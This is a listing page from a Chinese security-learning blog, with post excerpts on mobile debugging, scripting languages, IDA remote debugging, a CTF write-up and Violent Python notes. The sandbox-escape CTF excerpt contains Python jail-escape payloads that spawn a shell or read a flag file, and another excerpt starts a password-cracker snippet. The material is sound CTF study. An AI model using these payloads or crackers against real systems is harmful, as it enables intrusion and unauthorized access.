avatar
文章
331
标签
30
分类
0

Home
Archives
Tags
Categories
List
  • Music
  • Movie
Link
About
The Blog of Monoceros406
搜索
Home
Archives
Tags
Categories
List
  • Music
  • Movie
Link
About

The Blog of Monoceros406

Jadx在雷电模拟器下的远程动态调试笔记
发表于2023-10-23|移动安全
Jadx在雷电模拟器下的远程动态调试笔记雷电模拟器设置在“设置”中调试选择允许本地调试,在去官网上下载新版本的adb全部覆盖掉目录下的那些文件。 adb设置Jadx的默认端口为5037,所以开放该端口: 1adb connect 127.0.0.0:5037 Jadx设置启动雷电模拟器,打开Jadx的“选择要调试的进程”,双击一个进程。
Frida初体验
发表于2023-10-23|移动安全
Frida初体验Frida安装Frida与Python与模拟器的版本是互相匹配的,大约对应关系如下: 雷电模拟器9 对应 Android9 对应 Frida14.2.18 对应 Python3.10 如果能这么安装上更好: 1pip3 install frida==14.2.18 装不上自认倒霉(比如说我),去清华源上啥的自己下载报错提示的.egg文件,放在报错提示的缓存文件夹下,应该就行了。 然后下载Frida-tools: 12pip3 install frida-tools==9.2.5pip install frida-dexdump 去Github上:https://github.com/frida/frida/releases/tag/ 下载frida-server-14.2.18-android-x86_64.xz,直接解压,得到的文件可以自己重命名为frida-server啥的。如果报错可以换个其他版本试试。 雷电模拟器目录下有个adb.exe,但是版本很老了,从官网上下个新版本的,连着其他文件一起覆盖掉。 在雷电模拟器的“设置”的“其他设置”中开启root权限 ...
Ruby初探
发表于2023-10-22|编程语言
Ruby初探基本操作123puts 'hello, world'language='Ruby'puts 'hello, #{language}' 判断逻辑运算符短路。 123456789101112131415x=4puts 'aaa' unless x==4puts 'bbb' if x==4if x==4 puts 'ccc'endunless x==4 puts 'ddd'else puts 'eee'endputs 'fff' if not trueputs 'ggg' if !true#等同于true:数字、字符串#等同于false:nil 循环123456x=x+1 while x<10x=x-1 until x==1while x<10 x=x+1 puts xend 鸭子类型 Ruby在大多数情况下表现为“ ...
Lua初探
发表于2023-10-22|编程语言
Lua初探编译与反编译用以下命令将.lua源代码编译成.out字节码: 1luac main.lua 默认文件名为luac.out。反编译用unluac.exe,把.out文件拷到.exe同一文件夹下: 1unluac luac.out>main.lua 输出123456print(1989)return 1989=1989=xxx --nil类型:不存在print "xxx"print "xxx" print "xxx" --自动换行 字符串拼接1='xxx'..'xxx' 取字符串长度1=#'...' 表达式1234--数学表达式有+-*/% 和 乘方^=not((true or false)and false)=true or func() --“短路”:func()不会被执行-- ==相等~=不相等 函数1234567891011121314151617function triple(num) return 3*numend--或如下: ...
Python沙盒逃逸做题笔记
发表于2023-10-21|沙盒逃逸
Python沙盒逃逸做题笔记[HNCTF 2022 Week1]python2 input(JAIL)法一payload1: 1__import__('os').system('sh') 法二payload2: 1__builtins__.__import__('os').system('cat ./flag') [CISCN 2023 初赛]pyshell -:返回上一次运行语句的结果,可以进行字符串拼接。 输入长度不大于$7$。 法一总payload: 1eval(open("/flag","r").read()) 依次输入: 12345678910"open"_+'("/'_+'fla'_+'g"'-+',"r'_+'")'_+'.'_+'rea'_+&#x ...
IDA在Kali Linux下的远程动态调试笔记
发表于2023-10-21|逆向工程
IDA在Kali Linux下的远程动态调试笔记一、安装Kali Linux已经安装过的最好重装一个,下Vmware镜像就行。 二、配置服务器在IDA目录下的dbgsrv文件夹中有linux_server和linux_server64两个文件。在虚拟机中找个地方放起来,并给权限: 12chmod a+x ./linux_serverchmod a+x ./linux_server64 然后利用以下命令查看Kali Linux的IP地址并记住: 1ifconfig 把要被调试的程序放入虚拟机,并记住位置。该程序也要给权限。 运行服务器,注意32位运行linux_server,64位运行linux_server64。看到Kali开始监听。 三、配置IDA打开需要调试的程序,在上方工具栏下拉框中找到Remote Linux debugger调试器。设置断点,按F9进入调试。 出现对话框,第一空中填Kali Linux中要被调试的程序的路径,第二空中同上,第三空填该程序的目录(即去掉文件名)。在主机名中填入Kali Linux的IP地址,端口号默认。 点击确认,开始动调。
香山杯2023初赛个人做题记录
发表于2023-10-15|解题报告
香山杯2023初赛个人做题记录签到basecrack –magic一把梭,凯撒解码 URL从哪儿来丢ida,发现在windows的temp文件夹中创建文件,提取ou_XXXX.tmp改为ou.exe,丢ida,找到szUrl为http://how.did.i.decrypted?id=,发现v3->base64->作为密钥rc4加密得url,但是动调发现密钥被篡改,怀疑原密钥为flag,exp: 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162import base64v3=[0 for i in range(56)]v3[0]=120v3[1]=139v3[2]=150v3[3]=134v3[4]=120v3[5]=81v3[6]=145v3[7]=80v3[8]=108v3[9]=98v3[10]=119v3[11]=83v3[12]=108v3[13]=136v3[14]=99v3[15] ...
Violent_Python笔记
发表于2023-10-15|Python
Violent Python笔记本笔记为Python2代码。 入门抓取banner12345import socketsocket.setdefaulttimeout(2)s=socket.socket()s.connet(("192.168.95.148",21))ans=s.recv(1024)#1024B数据 UNIX口令破解机12import cryptcrypt.crypt("egg","HX") zip口令破解机123456import zipfilezFile=zipfile.ZipFile("*.zip")try: zFile.extractall(pwd="...")except Exception,e: print e 多线程12345678910from threading import Threaddef extractFile(zFile,password): #...def main(): passFile=open(' ...
Python爬虫笔记
发表于2023-10-15|Python
Python爬虫笔记urllibGET请求1234567import urllib.requesturl='https://...'response=urllib.request.urlopen(url=url)response.status #返回请求码 200response.getheaders() #返回响应头信息 [('Connection','close'),('Content-Length','48955'),('Server','nginx'),...]response.read().decode('utf-8') #返回HTML代码 POST请求123456import urllib.requestimport urllib.parseurl='...'data=bytes(urllib.parse.urlencode({'hello':'py ...
Python-OpenCV
发表于2023-10-15|Python
Python-OpenCV安装1pip install opencv-contrib-python 基本操作读取+显示图像123456789101112131415161718192021import cv2image=cv2.imread('*.jpg',cv2.IMREAD_UNCHANGED)""" image=cv2.imread(filename,flags) filename 文件名 flags 默认1为彩色 0为灰度图像 cv2.IMREAD_UNCHANGED 保持原格式 可选"""cv2.imshow("flower",image)""" cv2.imshow(winname,mat) winname 窗口名称 mat 图像"""cv2.waitKey()""" retval=cv2.wait ...
1…303132…34
avatar
Monoceros406
Windows系统安全爱好者
文章
331
标签
30
分类
0
Follow Me
公告
哪里排版出锅了请告诉我QwQ QQ:1295625063
最新文章
Linux编程入门-系统选项2025-06-21
Linux编程入门-时间2025-06-15
Linux编程入门-用户管理与安全2025-06-15
Linux编程入门-内存管理2025-06-15
Linux编程入门-进程2025-06-14
标签
漏洞复现 恶意代码 密码学 Python 渗透测试 取证 编程语言 逆向工程 AWD Win系统调试 其他 GUI开发 解题报告 沙盒逃逸 算法 Win内核安全 OpenSSL 移动安全 UEFI 数学建模 Win驱动开发 WinAPI IoT PWN 前端开发 Web Linux Web3 后端开发 Misc
归档
  • 六月 20258
  • 五月 20259
  • 十二月 202413
  • 十一月 202412
  • 十月 202420
  • 九月 20243
  • 八月 20248
  • 七月 202413
网站资讯
文章数目 :
331
已运行时间 :
本站访客数 :
本站总访问量 :
最后更新时间 :
©2020 - 2025 By Monoceros406
框架 Hexo|主题 Butterfly